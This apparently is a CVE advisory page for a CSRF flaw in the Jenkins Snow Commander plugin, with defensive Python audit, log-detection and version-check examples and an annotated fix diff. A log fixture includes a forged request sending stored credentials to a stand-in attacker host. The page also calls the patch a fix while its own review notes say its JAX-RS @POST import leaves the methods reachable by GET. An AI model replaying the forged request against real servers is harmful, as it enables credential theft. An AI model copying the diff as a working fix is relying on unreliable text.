VYPR
Moderate severity · NVD Advisory · Published Feb 15, 2022 · Updated Aug 3, 2024

CVE-2022-25192

Description

A CSRF vulnerability in Jenkins Snow Commander Plugin ≤ 1.10 lets attackers use stored credentials by tricking a user into visiting a malicious page.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

A cross-site request forgery (CSRF) vulnerability exists in the Snow Commander Plugin for Jenkins, versions 1.10 and earlier [1][3]. The plugin's Stapler form-validation methods (doCheckAddress, doCheckCredentialsId, doCheckTimeout and the other doCheck* methods touched by the fix) are neither annotated with @POST nor preceded by a permission check [2]. Jenkins enforces its CSRF protection (the crumb) only on POST requests, so a validation endpoint that accepts GET can be triggered by any page the victim happens to visit: the browser attaches the victim's Jenkins session cookie, and the method runs with the victim's permissions on attacker-chosen parameters.
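To make the defect pattern concrete, here is an added example (written for this page, not code from the Snow Commander plugin): a small Python audit that scans a Jenkins plugin's Java source for doCheck*/doFill* methods and reports those without a Stapler @POST annotation or a permission check, and also flags a @POST that resolves to the JAX-RS annotation, which Stapler does not enforce. The Java snippet inside it is constructed for the demo and only imitates the shape of the plugin's validation methods.

```python
"""Audit Java source for unguarded Jenkins form-validation endpoints.

Added example (not code from the Snow Commander plugin or this page). It
scans a plugin source file for Stapler web methods named doCheck*/doFill*
and reports each one that lacks a Stapler @POST annotation or a
permission check, the two defects behind CVE-2022-25192. It also flags a
@POST that resolves to javax.ws.rs.POST, which Stapler ignores. The Java
sample at the bottom is constructed for the demo.
"""
import re
from dataclasses import dataclass

# Stapler enforces the HTTP verb only for its own annotation.
STAPLER_POST = "org.kohsuke.stapler.verb.POST"
JAXRS_POST = "javax.ws.rs.POST"

# Public web methods that Jenkins exposes as /checkFoo or /fillFooItems.
METHOD_RE = re.compile(
    r"public\s+(?:FormValidation|ListBoxModel|ComboBoxModel)\s+"
    r"(do(?:Check|Fill)\w+)\s*\([^)]*\)[^{]*\{"
)


@dataclass
class Finding:
    method: str
    missing_post: bool          # no effective @POST: reachable by GET, no crumb needed
    missing_permission: bool    # body never calls checkPermission(...)
    wrong_post_import: bool     # @POST present but it is the JAX-RS annotation


def _method_body(src, open_brace):
    """Return src from the '{' at open_brace to its matching '}' (inclusive)."""
    depth = 0
    for i in range(open_brace, len(src)):
        if src[i] == "{":
            depth += 1
        elif src[i] == "}":
            depth -= 1
            if depth == 0:
                return src[open_brace:i + 1]
    return src[open_brace:]


def audit_java(src):
    imports = set(re.findall(r"^\s*import\s+([\w.]+);", src, re.M))
    has_stapler_post = STAPLER_POST in imports
    has_jaxrs_post = JAXRS_POST in imports
    findings = []
    cursor = 0
    for m in METHOD_RE.finditer(src):
        # Annotations sit between the previous method body (or javadoc) and the signature.
        preamble = re.split(r"\}|\*/", src[cursor:m.start()])[-1]
        annotated = "@POST" in preamble
        body = _method_body(src, m.end() - 1)
        cursor = m.end() - 1 + len(body)
        findings.append(Finding(
            method=m.group(1),
            missing_post=not (annotated and has_stapler_post),
            missing_permission="checkPermission(" not in body,
            wrong_post_import=annotated and has_jaxrs_post and not has_stapler_post,
        ))
    return findings


# Constructed sample: one unguarded method, one annotated with the wrong POST.
SAMPLE_JAVA = """\
package example;

import java.io.IOException;
import javax.ws.rs.POST;
import org.kohsuke.stapler.QueryParameter;
import hudson.util.FormValidation;
import jenkins.model.Jenkins;

public class ExampleConfig {
    /** Unguarded: any cross-site page can trigger it with a GET. */
    public FormValidation doCheckAddress(@QueryParameter String value) throws IOException {
        if (value.length() == 0)
            return FormValidation.error("address is required");
        return FormValidation.ok();
    }

    /** Annotated, but with the JAX-RS @POST, which Stapler does not enforce. */
    @POST
    public FormValidation doCheckTimeout(@QueryParameter Long value) throws IOException {
        Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        return FormValidation.ok();
    }
}
"""


def report(src=SAMPLE_JAVA):
    """Map method name -> Finding for the given Java source."""
    return {f.method: f for f in audit_java(src)}


if __name__ == "__main__":
    for name, finding in report().items():
        print(f"{name}: {finding}")
```

Run it against real plugin sources with `audit_java(open(path).read())`: a method reported with `missing_post` is reachable by GET and therefore from a cross-site page, and one with `missing_permission` runs for anyone who can reach it, which is the combination this CVE describes.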

Exploitation

An attacker who knows the URL of the victim's Jenkins instance must lure an authenticated user to a page containing the CSRF payload, for example an image tag or script whose URL points at one of the unguarded doCheck* endpoints [1]. The attacker also needs a valid credentials ID, which has to be obtained some other way (e.g., information disclosure or social engineering) [3]. The forged request carries attacker-supplied parameters, an address and a credentials ID, and the doCheck* method acts on them [2]. Because the request originates from the victim's browser, it carries the victim's session cookie and is processed as that user.
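As an added detection example (not part of the original advisory or the plugin), the following Python scans reverse-proxy access logs for the forged request described above: a form-validation URL (Stapler routes doCheckFoo to a path ending in /checkFoo) requested with a cross-site Referer, or with an address parameter pointing at a host that is not a known vCommander server. The proxy log format, the Jenkins origin, the allowed host list and the log lines themselves are assumed or constructed for the demo.

```python
"""Flag forged form-validation requests in reverse-proxy access logs.

Added example (not from this page or the plugin). It assumes Jenkins sits
behind a proxy that writes nginx/Apache "combined" format logs, that the
plugin's doCheck* methods are reached as .../checkFoo URLs (Stapler's
standard routing), that legitimate vCommander servers are listed in
ALLOWED_ADDRESS_HOSTS and that Jenkins is served from JENKINS_ORIGIN.
The log lines are constructed for the demo.
"""
import re
from urllib.parse import parse_qs, urlsplit

JENKINS_ORIGIN = "https://jenkins.example.internal"      # assumed
ALLOWED_ADDRESS_HOSTS = {"vcommander.example.internal"}  # assumed
JENKINS_HOST = urlsplit(JENKINS_ORIGIN).netloc

COMBINED_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Stapler maps doCheckFoo to a URL ending in /checkFoo.
CHECK_PATH_RE = re.compile(r"/check[A-Z]\w*$")


def _host_of(address):
    """Hostname of an address that may or may not carry a scheme."""
    return urlsplit(address if "://" in address else "//" + address).hostname


def analyze_line(line):
    m = COMBINED_RE.match(line)
    if not m:
        return None
    target = urlsplit(m["target"])
    if not CHECK_PATH_RE.search(target.path):
        return None
    params = parse_qs(target.query)
    reasons = []
    referer = m["referer"]
    if referer not in ("", "-") and urlsplit(referer).netloc != JENKINS_HOST:
        reasons.append(f"cross-site referer {urlsplit(referer).netloc}")
    # doCheckCredentialsId takes 'address'; doCheckAddress receives its field as 'value'.
    addresses = list(params.get("address", []))
    if target.path.endswith("/checkAddress"):
        addresses += params.get("value", [])
    for addr in addresses:
        host = _host_of(addr)
        if host and host not in ALLOWED_ADDRESS_HOSTS:
            reasons.append(f"address points to unapproved host {host}")
    if not reasons:
        return None
    return {"ip": m["ip"], "user": m["user"], "method": m["method"],
            "path": target.path, "reasons": reasons}


def analyze_log(text):
    return [hit for hit in map(analyze_line, text.splitlines()) if hit]


# Constructed sample: line 2 is the forged request (cross-site page, attacker host).
SAMPLE_LOG = """\
10.0.0.5 - alice [15/Feb/2022:10:01:02 +0000] "GET /descriptorByName/com.embotics.vlm.plugin.VCommanderConfig/checkCredentialsId?address=vcommander.example.internal&credentialsId=vc-admin HTTP/1.1" 200 58 "https://jenkins.example.internal/configure" "Mozilla/5.0"
10.0.0.5 - alice [15/Feb/2022:10:03:44 +0000] "GET /descriptorByName/com.embotics.vlm.plugin.VCommanderConfig/checkCredentialsId?address=https%3A%2F%2Fevil.example.net%3A8443&credentialsId=vc-admin HTTP/1.1" 200 58 "https://blog.example.net/post" "Mozilla/5.0"
10.0.0.9 - bob [15/Feb/2022:10:05:00 +0000] "POST /descriptorByName/com.embotics.vlm.plugin.VCommanderConfig/checkAddress?value=vcommander.example.internal HTTP/1.1" 200 12 "https://jenkins.example.internal/configure" "Mozilla/5.0"
10.0.0.5 - - [15/Feb/2022:10:06:10 +0000] "GET /static/1a2b/css/style.css HTTP/1.1" 200 1234 "https://jenkins.example.internal/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(hit)
```

The first line is the plugin's own UI validating a legitimate address and is not flagged; a GET by itself is normal for version 1.10 and earlier, so the rule keys on the cross-site Referer and the outbound target rather than on the verb. After upgrading to a release that requires POST, any remaining GET to these paths is worth a look on its own.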

Impact

Successful exploitation makes the Jenkins server connect to an attacker-controlled web server using credentials stored in Jenkins, which lets the attacker capture those credentials [1][3]. The attacker gains neither code execution nor administrative rights directly, but the captured credentials can be reused against the vCommander server or any other system that shares them, and so can lead to further compromise of Jenkins or connected systems. The impact is therefore credential disclosure plus an unauthorized outbound connection from the Jenkins server.

Mitigation

The vulnerability is fixed in Snow Commander Plugin version 2.0 [4]; users should upgrade to 2.0 or later. The fix commit adds a @POST annotation to every public form-validation method and inserts a Jenkins.ADMINISTER permission check at the start of most of them [2]. No workaround is known for version 1.10 and earlier, so upgrading is the only mitigation [1]. The CVE is not listed in the CISA Known Exploited Vulnerabilities catalog at the time of writing.
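An added inventory check (example code, not from the page or the plugin) that reads the JSON Jenkins serves at /pluginManager/api/json?depth=1 and flags the Snow Commander plugin when its installed version is 1.10 or lower. The plugin short name is taken from the Maven artifactId listed below (embotics-vcommander); the JSON document is constructed for the demo. Versions are compared numerically because a plain string comparison sorts 1.10 before 1.9.

```python
"""Is the installed Snow Commander plugin still at or below 1.10?

Added example (not from this page or the plugin). It parses the JSON
that Jenkins returns from /pluginManager/api/json?depth=1 (each plugin
entry carries shortName, version and active) and compares versions as
tuples of integers, since "1.10" < "1.9" as strings. The plugin short
name is assumed to equal the Maven artifactId embotics-vcommander; the
JSON below is constructed for the demo.
"""
import json
import re

AFFECTED_SHORT_NAME = "embotics-vcommander"  # assumed from the artifactId
LAST_VULNERABLE = "1.10"


def parse_version(v):
    """'1.10' -> (1, 10); '2.0-beta-1' -> (2, 0). Non-numeric suffixes are ignored."""
    m = re.match(r"[\d.]+", v)
    return tuple(int(p) for p in m.group(0).split(".") if p) if m else ()


def is_vulnerable(version):
    return parse_version(version) <= parse_version(LAST_VULNERABLE)


def find_affected(plugin_manager_json):
    """Return the affected plugin entries found in a pluginManager API document."""
    data = json.loads(plugin_manager_json)
    return [
        {"shortName": p["shortName"], "version": p["version"], "active": p.get("active")}
        for p in data.get("plugins", [])
        if p.get("shortName") == AFFECTED_SHORT_NAME and is_vulnerable(p.get("version", "0"))
    ]


# Constructed sample of the API response shape.
SAMPLE_PLUGIN_JSON = json.dumps({"plugins": [
    {"shortName": "embotics-vcommander", "version": "1.10", "active": True},
    {"shortName": "credentials", "version": "2.6.1", "active": True},
]})

if __name__ == "__main__":
    print(find_affected(SAMPLE_PLUGIN_JSON))
```

Feed it the body of an authenticated request to the Jenkins controller's /pluginManager/api/json?depth=1 endpoint; an empty list means the plugin is absent or already at 2.0 or later.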

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package: io.jenkins.plugins:embotics-vcommander (Maven)
Affected versions: >= 0
Patched versions: (not listed)


Patches (1)

Commit 4fb4e68e8e7b

CMSC-21922 Update all public formvalidation functions to require post

6 files changed · +29 -0
  • src/main/java/com/embotics/vlm/plugin/actions/AbstractVCommanderAction.java  +6 -0  modified
    @@ -3,6 +3,7 @@
     import java.io.IOException;
     
     import javax.servlet.ServletException;
    +import javax.ws.rs.POST;
     
     import org.kohsuke.stapler.QueryParameter;
     
    @@ -11,6 +12,7 @@
     
     import hudson.model.Descriptor;
     import hudson.util.FormValidation;
    +import jenkins.model.Jenkins;
     
     /**
      * A base class to be extended by the vCommadner actions.
    @@ -60,7 +62,9 @@ public static abstract class AbstractVCommanderActionDescriptor extends Descript
     		/**
     		 * Called by jelly, to validate timeout field
     		 */
    +		@POST
     		public FormValidation doCheckTimeout(@QueryParameter Long value) throws IOException, ServletException {
    +			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     			if (value == null || value < MINIMUM_TIMEOUT_VALUE) {
     				return FormValidation.error(Messages.VCommanderBuilder_errors_missingTimeout());
     			}
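Review bot: `Jenkins.ADMINISTER` is the wrong scope for this check, and `Jenkins.getInstance()` is deprecated in favour of `Jenkins.get()`. `doCheckTimeout` belongs to a build-step descriptor and is called from job configuration pages, so after this hunk a user who holds Item/Configure but not Overall/Administer is denied the validation they are entitled to, while an administrator is exactly the victim a CSRF page would target, so the permission check on its own does not close the CSRF. Jenkins' guidance for job-level doCheck methods is to take `@AncestorInPath Item item` and call `item.checkPermission(Item.CONFIGURE)` when item is non-null, falling back to `Jenkins.get().checkPermission(Jenkins.ADMINISTER)` otherwise; the same applies to `doCheckPolling` in the next hunk and to the doCheck methods in the other action descriptors in this commit.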
    @@ -71,7 +75,9 @@ public FormValidation doCheckTimeout(@QueryParameter Long value) throws IOExcept
     		/**
     		 * Called by jelly, to validate polling field
     		 */
    +		@POST
     		public FormValidation doCheckPolling(@QueryParameter Long polling, @QueryParameter Long timeout) throws IOException, ServletException {
    +			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     			if (polling == null ||polling < MINIMUM_POLLING_VALUE) {
     				return FormValidation.error(Messages.VCommanderBuilder_errors_missingPolling());
     			}
    
  • src/main/java/com/embotics/vlm/plugin/actions/VCommanderRequestNewServiceAction.java  +4 -0  modified
    @@ -14,6 +14,7 @@
     import java.io.IOException;
     import java.net.ConnectException;
     import java.util.List;
    +import javax.ws.rs.POST;
     
     import javax.servlet.ServletException;
     
    @@ -37,6 +38,7 @@
     import hudson.model.Run;
     import hudson.model.TaskListener;
     import hudson.util.FormValidation;
    +import jenkins.model.Jenkins;
     
     /**
      * A vCommander Action, which submits a new service request
    @@ -192,7 +194,9 @@ public String getPayload(String serviceName) throws IOException, ServletExceptio
     		/**
     		 * Called by jelly, to validate payload field
     		 */
    +		@POST
     		public FormValidation doCheckPayload(@QueryParameter String payload) throws IOException, ServletException {
    +			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     			// if no content, do not return error;
     			// we do not want to show the initial form with error
     			if (StringUtils.isBlank(payload)) {
    
  • src/main/java/com/embotics/vlm/plugin/actions/VCommanderRunWorkflowAction.java  +8 -0  modified
    @@ -15,6 +15,7 @@
     import java.net.ConnectException;
     
     import javax.servlet.ServletException;
    +import javax.ws.rs.POST;
     
     import org.apache.commons.lang.StringUtils;
     import org.codehaus.jettison.json.JSONException;
    @@ -35,6 +36,7 @@
     import hudson.model.TaskListener;
     import hudson.util.ComboBoxModel;
     import hudson.util.FormValidation;
    +import jenkins.model.Jenkins;
     
     /**
      * A vCommander Action, which triggers a command workflow
    @@ -156,7 +158,9 @@ public ComboBoxModel doFillTargetTypeItems() {
     		/**
     		 * Called by jelly, to validate targetType field
     		 */
    +		@POST
     		public FormValidation doCheckTargetType(@QueryParameter String targetType) throws IOException, ServletException {
    +			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     			// if no content, do not return error;
     			// we do not want to show the initial form with error
     			if (StringUtils.isBlank(targetType)) {
    @@ -173,7 +177,9 @@ public FormValidation doCheckTargetType(@QueryParameter String targetType) throw
     		/**
     		 * Called by jelly, to validate targetName field
     		 */
    +		@POST
     		public FormValidation doCheckTargetName(@QueryParameter String targetType, @QueryParameter String targetName) throws IOException, ServletException {
    +			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     			// if no content, do not return error;
     			// we do not want to show the initial form with error
     			if (StringUtils.isBlank(targetName)) {
    @@ -190,7 +196,9 @@ public FormValidation doCheckTargetName(@QueryParameter String targetType, @Quer
     		/**
     		 * Called by jelly, to validate workflowName field
     		 */
    +		@POST
     		public FormValidation doCheckWorkflowName(@QueryParameter String targetType, @QueryParameter String workflowName) throws IOException, ServletException {
    +			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     			// if no content, do not return error;
     			// we do not want to show the initial form with error
     			if (StringUtils.isBlank(workflowName)) {
    
  • src/main/java/com/embotics/vlm/plugin/actions/VCommanderWaitForRequestNewServiceAction.java  +4 -0  modified
    @@ -14,6 +14,7 @@
     import java.io.IOException;
     
     import javax.servlet.ServletException;
    +import javax.ws.rs.POST;
     
     import org.apache.commons.lang.StringUtils;
     import org.kohsuke.stapler.DataBoundConstructor;
    @@ -31,6 +32,7 @@
     import hudson.model.Run;
     import hudson.model.TaskListener;
     import hudson.util.FormValidation;
    +import jenkins.model.Jenkins;
     
     /**
      * A vCommander Action, which should be used in pair with VCommanderRequestNewServiceAction
    @@ -110,7 +112,9 @@ public String getDefaultRequestId() {
     		/**
     		 * Called by jelly, to validate requestId field
     		 */
    +		@POST
     		public FormValidation doCheckRequestId(@QueryParameter String requestId) throws IOException, ServletException {
    +			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     			if(PluginUtils.isNumericOrVariable(requestId)) {
     				return FormValidation.ok();
     			} else {
    
  • src/main/java/com/embotics/vlm/plugin/actions/VCommanderWaitForRunWorkflowAction.java  +4 -0  modified
    @@ -14,6 +14,7 @@
     import java.io.IOException;
     
     import javax.servlet.ServletException;
    +import javax.ws.rs.POST;
     
     import org.apache.commons.lang.StringUtils;
     import org.kohsuke.stapler.DataBoundConstructor;
    @@ -31,6 +32,7 @@
     import hudson.model.Run;
     import hudson.model.TaskListener;
     import hudson.util.FormValidation;
    +import jenkins.model.Jenkins;
     
     /**
      * A vCommander Action, which should be used in pair with VCommanderRunWorkflowAction
    @@ -100,7 +102,9 @@ public String getDefaultTaskId() {
     		/**
     		 * Called by jelly, to validate task ID field
     		 */
    +		@POST
     		public FormValidation doCheckTaskId(@QueryParameter String taskId) throws IOException, ServletException {
    +			Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     			if(PluginUtils.isNumericOrVariable(taskId)) {
     				return FormValidation.ok();
     			} else {
    
  • src/main/java/com/embotics/vlm/plugin/VCommanderConfig.java  +3 -0  modified
    @@ -186,7 +186,9 @@ public ListBoxModel doFillCredentialsIdItems(@AncestorInPath Item item, @QueryPa
     	/**
     	 * Called by jelly, to validate address field
     	 */
    +	@POST
     	public FormValidation doCheckAddress(@QueryParameter String value) throws IOException, ServletException {
    +		Jenkins.getInstance().checkPermission(Jenkins.ADMINISTER);
     		if (value.length() == 0)
     			return FormValidation.error(Messages.VCommanderConfig_errors_missingAddress());
     
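Review bot: no import hunk accompanies this file, so it is not visible which `POST` the annotation on `doCheckAddress` resolves to; if `VCommanderConfig.java` imports `javax.ws.rs.POST` as the action classes in this commit do, the annotation does not restrict the method to POST and must be `org.kohsuke.stapler.verb.POST`. `Jenkins.ADMINISTER` is the right scope here, since this is global configuration. While touching the method: `value.length()` runs before any null check, and `@QueryParameter` delivers null when the parameter is absent, so a request without it ends in a NullPointerException; `value == null || value.isEmpty()` (or `Util.fixEmptyAndTrim(value) == null`) is the usual guard.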
    @@ -196,6 +198,7 @@ public FormValidation doCheckAddress(@QueryParameter String value) throws IOExce
     	/**
     	 * Called by jelly, to validate credential field
     	 */
    +	@POST
     	public FormValidation doCheckCredentialsId(@AncestorInPath Item item, @QueryParameter String address, @QueryParameter String credentialsId) {
     		// Return no-op validation results for users that do not have permission to list
     		// credentials
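Review bot: `doCheckCredentialsId` is the method that takes both `address` and `credentialsId`, the two attacker-supplied parameters the advisory describes, yet it is the only validation method in this commit that gains `@POST` without an explicit `checkPermission` line; the existing comment only promises a no-op result for users who may not list credentials. Confirm that the check already inside the method runs before the credential is resolved or the address is contacted and that it covers both contexts, `item.checkPermission(Item.CONFIGURE)` when `item` is non-null and `Jenkins.ADMINISTER` when it is null (global configuration). As for the other files, verify that the `POST` import in this file is Stapler's, since a JAX-RS `@POST` leaves the method reachable by GET and therefore by a cross-site page.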
    

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (4)

News mentions (1)